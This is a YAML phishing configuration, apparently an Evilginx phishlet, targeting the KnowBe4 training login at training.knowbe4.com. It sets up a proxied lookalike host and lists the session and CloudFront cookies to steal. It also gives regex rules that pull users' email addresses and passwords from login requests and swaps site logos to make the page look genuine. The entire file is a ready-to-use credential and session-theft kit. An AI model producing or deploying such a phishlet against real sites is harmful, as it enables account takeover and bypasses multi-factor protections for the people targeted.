name: 'KnowBe4'
author: '@fin3ss3g0d'
min_ver: '3.1.0'
proxy_hosts:
  - {phish_sub: 'training', orig_sub: 'training', domain: 'knowbe4.com', session: true, is_landing: true}
sub_filters:   
# Replace client's logo with knowbe4's
  - {triggers_on: 'training.knowbe4.com', orig_sub: 'training', domain: 'knowbe4.com', search: '"logoURL":"([^"]*)', replace: '"logoURL":"', mimes: ['text/html', 'application/json', 'application/x-javascript']}
# Replace knowbe4's logo with clients
# - {triggers_on: 'training.knowbe4.com', orig_sub: 'training', domain: 'knowbe4.com', search: '"logoURL":"([^"]*)', replace: '"logoURL":"https://example.com/client_logo.png', mimes: ['text/html', 'application/json', 'application/x-javascript', 'application/javascript']}
auth_tokens:
- domain: '.training.knowbe4.com'
  keys: ['_knowbe4_session_new']
- domain: 'training.knowbe4.com'
  keys: ['CloudFront-Policy', 'CloudFront-Signature', 'CloudFront-Key-Pair-Id', 'previous_login_scope']
  type: 'cookie'
auth_urls:
  - '/learner/index.html'
credentials:
  username:
    key: ''
    search: '"email":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: 'training.knowbe4.com'
  path: 'ui/login'
